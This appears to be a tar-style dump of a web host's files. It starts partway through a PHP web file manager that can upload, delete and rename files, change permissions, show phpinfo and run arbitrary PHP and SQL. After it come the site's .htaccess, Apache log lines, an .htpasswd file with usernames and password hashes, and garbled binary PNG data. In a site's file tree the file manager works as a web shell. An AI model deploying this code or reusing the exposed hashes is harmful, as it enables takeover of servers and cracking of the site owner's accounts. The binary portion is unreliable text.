'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <form method="post" action="<?=$url_inc?>" style="display:inline"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15"> <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5"> <input type="submit" name="search" value="<?=__('Search')?>"> </form> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/henriyzx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?> .htaccess 0000644 00000001733 15114726654 0006361 0 ustar 00 #----------------------------------------------------------------cp:ppd # Section managed by cPanel: Password Protected Directories -cp:ppd # - Do not edit this section of the htaccess file! -cp:ppd #----------------------------------------------------------------cp:ppd AuthType Basic AuthName "Protected 'admin.imators.com'" AuthUserFile "/home/gqdcvggs/.htpasswds/admin.imators.com/passwd" Require valid-user #----------------------------------------------------------------cp:ppd # End section managed by cPanel: Password Protected Directories -cp:ppd #----------------------------------------------------------------cp:ppd <Files 403.shtml> order allow,deny allow from all </Files> # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php81” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php81 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit var/log/apache2/domlogs/gqdcvggs/admin.imators.com 0000640 00000001031 15114745066 0016136 0 ustar 00 3.140.182.19 - - [05/Dec/2025:18:27:08 +0100] "GET / HTTP/1.1" 404 - "-" "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" 63.35.212.134 - - [05/Dec/2025:20:25:23 +0100] "GET / HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 43.130.60.195 - - [06/Dec/2025:08:09:23 +0100] "GET /.*$ HTTP/1.1" 404 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" passwd 0000644 00000000127 15114753446 0006002 0 ustar 00 Izhak:$apr1$mOhVkXzk$rhzLn4u5.rMlpD1aFp8C2. IZHAK:$apr1$mAipj87X$O9enepYIexB6vVBNg3EWy0 failref.png 0000644 00000006210 15114762035 0006665 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� IDATx��MV���H�*B�3�Ux�xՠݡ�h�}���%ٖd����ؖ�+�'1�����C�_]@�$?�ބ���k�m8�~>�_�Z@=��~�.��'X�tD;,�:,�:,�:,�:,�:,�:,�:,�:,�:,�:,�:,�:,�:,�:,�:,�:,�:,��a�b�rxe���0��Pɰ8x��"�y�aN�5�T�ل���uw���*V��J�E��=�Fw�L���,XMg�ڬlXS+n�B¢O_�1X//�F�?}A`�n��Q���ֈ��V�$,�%.���*o�.B��2���b��V�Iâ�3�O���EohX�=��º}|<aa5w���?VX_�sCtm��'G�!,:��xGÂ�� ˵̽Xn�㚺^��7�'��XԞR�`��9 ,��WZAX����r�3�]w�@`�dX���`q�� �&/���2.�"��K&[B XT��VV��VX�0�� S)�a-���M* �6�Z����-=�+,Y���YdK��%�Q�*��?�`E��%�%��8���j��'V$���2v�鰦�R��O��Oª�$8 � +D��[Su͝-aQ:_&�L����r�� k�aX���q[�d�w�j���XFi�aa�5�R�'�T5X-9�jfX��x+��aM}Lk9J���i��ۛ�ZXX�X+ k��u���\ia�7�Z۟�`�s���l�s>��hIO�`щ�e�DX����a1�+7�֣�eZ�=�7�X�a��q��_`����>k�2�Y�a�t(39�b���wa��+ K�ж�S",_k���y�s�E����(N�����^�'\X�3��,���j�\�5r��3��q�<2T?Ũ4���Z�eZkSZPXk!`�~�a1�����Z�`�y�s�e�b:,�ֺ.?��7���Bayrh���Y�a�7.'���,5��_U'\^X��Lk���r[��^��-���V;���ҭU�C�=���z|�Y�*-0��M�`��2����(���a���1���9���a ,�������%�e[�<,�<k��.,;�����B�r�Ѐ�g�9��况5�a��TXky`�_�6ݻOh @�ai֪�5��}���H�n-��0�9\a9�Y�ϰa�֪�9��}�� k0rxX�ϰ�������C�miY�6�gXQXnci�J�����1��{��k��SX���:��r��P��VZ8X���ÞB�`-�z� �B�:,��Z���֩�4.X�������ʽ���Z並�����{�!7��?^Z��>��ry���6��z���",� wo9`}?�|���"a٥���;������n�`A�o��x+ �W�Òò� �7�w���E_yj�f��UZz��7�w���a�a=X���4������I��ʡ+�~�}�[1X����* +�~�}�[QX�⚭U�"f���"�$�<OqX����۞ ���n2��U`VXt��AkȀuޑֶ�o"��Sv�KiuXZ|k����+r�ߝN���ߝ�5$�2~��g�6�҅�e�M�VIX�y�n3,]Xfq�քe|���X+�Q\CqX�y�q^���e���C9X�y�q^�e����TX��P��{�u��h�ai5?Z�,c�u��h�a�5?��*�5�:�K�`�5�x/�=�:�K�R`-�5L�U�"�<+my9�����6�V&,�;�I���k�VX�U*,U\�w�a��(��;,0�[����6P�K���{�v��`M5ϋ��'Ç=�\Xc͗s�|�r\e��xaX߱�^�����)v�_m���oe�%�S��ˏ!�X�����+�Ӕ��U;js��0k��GT�S�V��Y�ĪIX)ƺ�3��v�a�IY��BxUXI!�(�Dc]V��. +�ݯ +5����`�g4��:�k��a��z�����2Bx=X!l �p�e��ae�b�rڽ)X��� �++ VV/+�Xׂ�i�K��k��`E��!<�+7�m���/,�ՉS���m���n��`J+?�g�,$��^Vc]Vc�������E�Bxjca`��U`1�U`1V{�� _�����?%S+��6V����%˰:w �� �� �{����*W��ό��*����E���)��m�Z�����*�fa��!<} ��kuc���*g��a���~��aIk��U0�Mâ��u�`M���2�U��[�EK����`��!l�XAX� ��u7X��MkX�`�r߄�°ʵV��U*�m���(�T�HaVk5q($QXE���0�D ! V~�1�=`��X X٭Վ� �r[�����b;!�� bC!�����B�E�i5� +��Z*,��X[M�J��� ��a��Vk���j���"X��j���$��B���Jb{$8X�$6�A��M��3H���� �D��E ΐ7�W����Q��,�X�(6w��+�E_y�ͮ�k�W� J�5�v)WMJ�%�8��uWMʀ5��ض^��.��������������d�|sf<U�� Ժ���֏� �x~���j��n������z���.W{��8,�#9�1b�9q?�\|TǏ� ��1.uc�\2���)�V��T�m�5-'r�j=T�sޒ���$�qG�A�u���o��1i"��m��6��$�66�r�.]M����0���%g��,}O�Y���n`���`-k#��0��K��������������K~:���/"C~���,������tX�fXtuYaY�Ȏ��%�u��^��R�4Ú.�mW�8�|������K~�yd�w ��*Q�t6� ^`PG ��Sq� ^YG��v����8S�k�v$Qɕ�H�Z��~{Ӏ�<�E}ܓ�z���x��6�|��l��"�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!�a!$a�.�&X?��@za=�gяgҍ����ǿ�;+��qw IEND�B`� size.png 0000644 00000004657 15114762035 0006244 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� @IDATx���Kr�6`��2�u�7p�q�-��7��B|��? [ ����i�sw�Dٖ��C̻x�Ch''��׳C+y\ZĜF��!�m���X�0��X@ca, ����0��X@ca, ����0�r,���R} ��q1�я��dc)��~������(�}3gb)u��a].��WW�\�,��+K���Xcu���c�����u/�XR��Q�����>5 ־CX�K���a)�*���震����ɇ5r}�~R,�Z��.]�- ��֥�N�cyz0��c'��|=���X�9��3*�9��K"��e`�Ɩ��?�O�'BÒ��5�2��a�m�L���y!a�s&al�Xr�71lJ}�oj�hu�a+=�l�a�n+��~� ������J�-n4�a�[Vrl���W]W�6f��`��0��[}U���a%�+,�X��0��h�4VCG���-��4V�m�qT��aC�Y?�UsRXj��!��Ś��= ��Ś�y���CV/�5q�CayK���I#Ʊ��ꤴ ,Oc��=O�щb�ۣ��}x��^�3��ϳ�m��C"V��x��W�����X����M�+-*V�X���k`�%v�}]9�ۅ�>$c��V k]�2���'��),���X��"U��� }�U�(-ZMb�}�p��h����vaV�Xf�j��e6�[�>���ۇ'2�����Uw`,��J�ZJ�߅%X�_M��B���!��|i1�V��>���� V����B�|��w��?�G�>,k�j�=+܅v"X�>����+��U�M��J�<�ecY�W��g��u��Gc�W���k�XZ�ay�Ї�|V��Y��:�^i��׳�X�>��ʲڰ���*�r�VzfMGÊgV��}�a��ecY�Wf���־��Us|X�.<`}aXM_L�a]k��X����#k߇ V��4�XWƚ7�� ��>|���=�dbm}�8,s�Ws�U��O�[�:S���X��z����5^�j�ǡ��7ua����⨪��\,���Ʋ��ۆ����15b �N.�օk�XVZX�ɛ�,*��X�y��ס+�U�>TeX-���8Xă�և0V�KZXsi1c�R�u}y�3˔���g, EXW�b�P��t�0p0�K�j�p�X@ʰ�>d,����XPi1���X�\���)ź�f,����|)ƺ�c�bc�a�+���Mye�X�TcER�������X@���a+�b,�:���0�b,�`�X��Xǔ�MV�+4���+�`�X��Xǔ�|&V��b�W:s`,$�B�����b,$����I����j�`�XH��pO6V�]X��RC�B��g첱Y�������$�/��c5<�3�u>V˅�XHʰ^�`�XH�^�"���R2�XMV��Wt��j� 